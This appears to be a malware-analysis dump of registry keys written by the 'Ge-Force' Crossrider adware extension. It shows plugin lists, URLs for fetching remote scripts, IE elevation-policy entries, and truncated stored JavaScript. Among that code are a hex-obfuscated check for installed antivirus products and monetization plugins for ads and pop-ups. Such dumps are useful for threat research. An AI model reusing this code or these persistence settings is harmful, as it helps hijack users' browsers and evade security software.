    "JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)<0&&/(mozilla)(?:.*? rv:([\w.] )|)/.exec(h)||[];var f=/(ipad)/.exec(h)||/(iphone)/.exec(h)||/(android)/.exec(h)||/(windows)/.exec(h)||/(mac)/.exec(h)||/(linux)/.exec(h)||/(ubuntu)/.exec(h)||[];return{browser:g[1]||,version:g[2]||0,platform:f[0]||};};a=d.uaMatch(c.navigator.userAgent);b={};if(a.browser){b[a.browser]=true;b.name=(b.rv?msie:a.browser);b.version=a.version;}if(a.platform){b[a.platform]=true;b.os=(a.platform===windows?win:a.platform);}if(b.chrome||b.opr){b.webkit=true;}else{if(b.webkit){b.safari=true;}}if(b.rv){b"

    [HKCU\Software\InstalledBrowserExtensions\iWebar]
    "69129" = "Ge-Force"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
    "BaseClass" = "Drive"

    [HKCU\Software\Ge-Force\Plugins\286]
    "Version" = "2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
    "UninstallString" = "%Program Files%\Ge-Force\Uninstall.exe /fcp=1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKCU\Software\Ge-Force\Plugins\28]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/28.js"

    [HKCU\Software\Ge-Force\Plugins\354]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/354.js"

    [HKCU\Software\Ge-Force\Plugins\104]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/104.js"

    [HKCU\Software\Ge-Force\Plugins\192]
    "Version" = "10"

    [HKCU\Software\Ge-Force\Plugins\91]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/91.js"

    [HKCU\Software\Ge-Force\Plugins\345]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/345.js"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Ge-Force\Plugins\192]
    "Name" = "revizer_ws_dynamic_b2b_m"

    [HKCU\Software\Ge-Force\Plugins\94]
    "JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se"

    [HKCU\Software\Ge-Force\Plugins\93]
    "Name" = "superfish_no_coupons_m"

    [HKCU\Software\Ge-Force\Plugins\3]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\Ge-Force\Plugins\273]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/273.js"

    [HKCU\Software\Ge-Force\Plugins\22]
    "Version" = "5"

    [HKCU\Software\Ge-Force\Plugins\21]
    "JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,@"

    [HKCU\Software\Ge-Force\Plugins\281]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\200]
    "Name" = "foxydeal_m"

    [HKCU\Software\Ge-Force\Plugins\345]
    "JavaScript" = "__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358],intext:[103,117,123,142,259,263,342,359,360],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351]};"

    [HKCU\Software\Ge-Force\Code]
    "AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com**********************************************... = http://wt.iwebar.com;TOOLBAR_URL = HOST '/js/toolbar.js';AFFILIATE_ID = 'NONE';appAPI.ready(function($) { /* if (appAPI.db.get('user_id') === null) { if (appAPI.db.get('installation') === null){ appAPI.db.set('installation', new Date().getTime()); return; } else { if ((new Date().getTime() - appAPI.db.get('installation')) < 1000 * 60 * 60 * 48){ //No need to display toolbar... hasn't been 2 days yet. return; } } }*/ console.log(=======> Extension [version: appAPI.appInfo.version ] loading...); // Set the affiliate ID //appAPI.db.set('affiliate_id', AFFILIATE_ID); // Include the Base64 library appAPI."

    [HKCU\Software\Ge-Force\Manifest]
    "RunInFrame" = "false"

    [HKCU\Software\Ge-Force\Plugins\221]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"

    [HKCU\Software\Ge-Force\Plugins\123]
    "Version" = "12"

    [HKCU\Software\Ge-Force\Plugins\192]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('...', 'jlxnmxfiyl'); }"

    [HKCU\Software\Ge-Force\Manifest]
    "BgVersion" = "1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
    "CrPublisherId" = "21836"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
    "AppName" = "Ge-Force-bg.exe"

    [HKCU\Software\Ge-Force\Plugins\46]
    "Version" = "5"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
    "AppName" = "Ge-Force-codedownloader.exe"

    [HKCU\Software\Ge-Force]
    "ActiveAppId" = "69129"

    [HKCU\Software\Ge-Force\Plugins\183]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/183.js"

    [HKCU\Software\Crossrider]
    "Verifier" = "7d6635bb3acc762051a59407230a02ec"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
    "Policy" = "1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
    "CrAppId" = "69129"
    "DisplayVersion" = "1.35.12.18"

    [HKCU\Software\Ge-Force\Plugins]
    "BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,345,354,253,93,102,104,123,180,184,192,220,195,200,221,223,242,263,273,281,286,301,91"

    [HKCU\Software\Ge-Force\Plugins\72]
    "Name" = "appApiValidation"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
    "DisplayIcon" = "%Program Files%\Ge-Force\utils.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\Ge-Force\Plugins\35]
    "Name" = "IEAjax"

    [HKCU\Software\Ge-Force\Plugins\207]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/207.js"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKCU\Software\Ge-Force\Plugins\37]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100),focusTimer:(typeof b.focusTimer===number?b.focusTimer:0),focusDelay:(typeof b.focusDelay===number?b.focusDelay:0)};appAPI.e"

    [HKCU\Software\Ge-Force\Plugins\350]
    "Name" = "nguava_m"

    [HKCU\Software\Ge-Force\Plugins\43]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars)"

    [HKCU\Software\Ge-Force\Debug]
    "IsDebuggingPlugins" = "0"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
    "AppPath" = "%Program Files%\Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\288]
    "Name" = "firstoffer_pricecomp_m"

    [HKCU\Software\Ge-Force\Plugins\220]
    "JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(f){var i=(function(){var y={\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1,\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2,\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64:4,\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:8,\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:16,\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64:32,\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:64,\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:128,\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64:256,\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:512,\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1024,\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2048,\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64"

    [HKCU\Software\Ge-Force\Plugins]
    "NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"

    [HKCU\Software\Ge-Force\Plugins\35]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/35.js"

    [HKCU\Software\Ge-Force\Plugins\273]
    "Name" = "aedgency_back_button_m"

    [HKCU\Software\Ge-Force\Plugins\40]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Plugins]
    "OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"

    [HKCU\Software\Ge-Force\Plugins\2]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\Ge-Force\Plugins\21]
    "Version" = "5"

    [HKLM\SOFTWARE\Ge-Force\Installer]
    "BundledIe" = "1"

    [HKCU\Software\Ge-Force\Plugins\354]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\193]
    "URL" = "http://js.newstatsdemosrv.com/plugins/mins/193.js"

    [HKCU\Software\Ge-Force\Plugins\42]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/42.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\Ge-Force\Plugins\47]
    "Name" = "resources_background"

    [HKCU\Software\Ge-Force\Plugins\39]
    "JavaScript" = "if(typeof appAPI==="undefined"){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g="%@%ZZCR__AJAXZZ$C@R#";function e(o,q,l,p){if(typeof(o)!=="string"){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m=="InstallerParams"&&n=="Local"){return appAPI.JSON.parse(appAPI.internal.prefs.getChar("Params"

    [HKCU\Software\Ge-Force\Plugins\1]
    "JavaScript" = "var __a0__ = ['\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x39\x75\x36\x61\x32\x70\x36','\x2e\x73\x73\x6c\x2e\x68\x77\x63\x64\x6e\x2e\x6e\x65\x74'].join('')var __a1__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74\x61\x67\x69\x6e\x67\x2d\x61\x70','\x70\x2e\x63\x72\x6f\x73\x73\x72\x69\x64\x65\x72\x2e\x63\x6f\x6d'].join('')var __a2__ = ['\x68\x74\x74\x70\x73\x3a\x2f\x2f','\x77\x39\x75\x36\x61\x32\x70\x36','\x2e\x73\x73\x6c\x2e\x68\x77\x63','\x64\x6e\x2e\x6e\x65\x74'].join('')var __a3__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74\x61\x67\x69','\x6e\x67\x2d\x61\x70\x70\x2e\x63\x72\x6f\x73\x73','\x72\x69\x64\x65\x72\x2e\x63\x6f\x6d'].join('')var __a4__ = ['\x68\x74\x74\x70\x3a\x2f','\x2f\x6e\x73\x74\x61\x74','\x73\x2e\x63\x72\x6f\x73','\x73\x72\x69\x64\x65\x72','\x2e\x63\x6f\x6d'].join('')var __a5__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74','\x61\x67\x69\x6e\x67\x2d\x61\x70\x70','\x2e\x63\x72\x6f\x73\x73\x72\x69\x64','\x65\x72\x2e\x63\x6f\x6d'].join('')var __a6__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x73\x6f','\x75\x72\"

    [HKCU\Software\Ge-Force\Plugins\207]
    "Name" = "dbWrapper"

    [HKCU\Software\Ge-Force\Plugins\354]
    "JavaScript" = "__CTG_MAPPING__={""1"":[""d908e50170d7cb46a92fdbff0d73bb5d""

    [HKCU\Software\Ge-Force\Plugins\44]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/44.js"

    [HKCU\Software\Ge-Force\Manifest]
    "UninstallerOfferAction" = "NA"

    [HKCU\Software\Ge-Force\Plugins\182]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]"

    [HKCU\Software\Ge-Force\Installer]
    "zdata" = "0"

    [HKCU\Software\Ge-Force\Code]
    "NewTabJavaScript" = ""

    [HKCU\Software\Ge-Force\Installer]
    "Params" = "{ source_id : 001729, sub_id : 0, uzid : 0"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
    "Policy" = "3"

    [HKCU\Software\Ge-Force\Plugins\184]
    "Name" = "noproblemppc_m"

    [HKCU\Software\Ge-Force\Manifest]
    "Version" = "9"

    [HKCU\Software\Ge-Force\Plugins\44]
    "Name" = "IEMisc"

    [HKCU\Software\Ge-Force\Plugins\286]
    "Name" = "sp_j_m"

    [HKCU\Software\Ge-Force\Plugins\36]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/36.js"

    [HKCU\Software\Ge-Force\Plugins\246]
    "Version" = "15"

    [HKCU\Software\Ge-Force\Plugins\3]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/3.js"

    [HKCU\Software\Ge-Force\Plugins\345]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\91]
    "Version" = "111"

    [HKCU\Software\Ge-Force\Plugins\47]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/47.js"

    [HKCU\Software\Ge-Force\Plugins\301]
    "Name" = "guava_m"

    [HKCU\Software\Ge-Force\Plugins\45]
    "Name" = "IEOnRequest"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
    "Ge-Force-bg.exe" = "8000"

    [HKCU\Software\Ge-Force\Plugins\28]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Plugins\356]
    "URL" = "http://js.newstatsdemosrv.com/plugins/mins/356.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKCU\Software\Ge-Force\Plugins\281]
    "Name" = "ibario_tier3_pops_m"

    [HKCU\Software\Ge-Force\Plugins]
    "BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"

    [HKCU\Software\Ge-Force\Plugins\281]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/281.js"

    [HKCU\Software\Ge-Force\Plugins\207]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbac"

    [HKCU\Software\Ge-Force\Plugins\193]
    "Version" = "9"

    [HKCU\Software\Ge-Force\Plugins\195]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/195.js"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
    "Policy" = "1"

    [HKCU\Software\Ge-Force\Plugins\207]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\13]
    "Version" = "7"

    [HKCU\Software\Ge-Force\Manifest]
    "PluginsManifestVersion" = "5"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKCU\Software\Ge-Force\Plugins\4]
    "JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f(< a >).appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtt"

    [HKCU\Software\Ge-Force\Plugins\41]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/41.js"

    [HKCU\Software\Ge-Force\Plugins\337]
    "Version" = "1"

    [HKCU\Software\Ge-Force\Plugins\78]
    "Name" = "CrossriderInfo"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
    "AppName" = "Ge-Force-buttonutil.exe"

    [HKCU\Software\Ge-Force\Plugins\41]
    "Name" = "IEInfo"

    [HKCU\Software\Ge-Force\Installer]
    "FullVersion" = "1.35.12.18"

    [HKCU\Software\Ge-Force\Plugins\93]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/93.js"

    [HKCU\Software\Crossrider]
    "Bic" = "589912D45CE0412C9CDE01D4C96E2298IE"

    [HKCU\Software\Ge-Force\Plugins\220]
    "Version" = "38"

    [HKCU\Software\Ge-Force\Manifest]
    "ChangePrevious" = "false"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
    "Policy" = "3"

    [HKCU\Software\Ge-Force\Plugins\72]
    "JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=p"

    [HKCU\Software\Ge-Force\Plugins\3]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\35]
    "Version" = "4"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
    "AppName" = "Ge-Force-buttonutil.exe"

    [HKCU\Software\Ge-Force\Plugins\43]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/43.js"

    [HKCU\Software\Ge-Force\Plugins\64]
    "Version" = "3"

    [HKCU\Software\Ge-Force\Plugins\286]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/286.js"

    [HKCU\Software\Ge-Force\Plugins\72]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/72.js"

    [HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
    "69129" = "Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\9]
    "Version" = "3"

    [HKCU\Software\Ge-Force\Plugins\78]
    "Version" = "5"

    [HKCU\Software\Ge-Force\Plugins\104]
    "Version" = "13"

    [HKCU\Software\Ge-Force\Plugins\177]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/177.js"

    [HKCU\Software\Ge-Force\Manifest]
    "ModeType" = "production"

    [HKCU\Software\Ge-Force\Plugins\94]
    "Name" = "IEPopup"

    [HKCU\Software\Ge-Force\Installer]
    "srcid" = "001729"

    [HKCU\Software\Ge-Force\Plugins\13]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/13.js"

    [HKCU\Software\Ge-Force\Installer]
    "ErrorsDomain" = "http://errors.newstatsclientcloud.com"

    [HKCU\Software\Ge-Force\Plugins\37]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/37.js"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKCU\Software\Ge-Force\Plugins\36]
    "Name" = "IEBackground"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Ge-Force\Plugins\180]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/180.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
    "AppName" = "Ge-Force-bg.exe"

    [HKCU\Software\Ge-Force\Plugins\356]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[356]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(356,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:MAN}))();};"

    [HKCU\Software\Ge-Force\Plugins\180]
    "Version" = "12"

    [HKCU\Software\Ge-Force\Plugins\41]
    "Version" = "7"

    [HKCU\Software\Ge-Force\Plugins\223]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/223.js"

    [HKCU\Software\Ge-Force\Plugins\180]
    "Name" = "bpo_serp_m"

    [HKLM\SOFTWARE\Tempo]
    "(Default)" = "tempo"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKCU\Software\Ge-Force\Plugins\40]
    "Name" = "IEExtension"

    [HKCU\Software\Ge-Force\Plugins\273]
    "Version" = "6"

    [HKCU\Software\Ge-Force\Plugins\195]
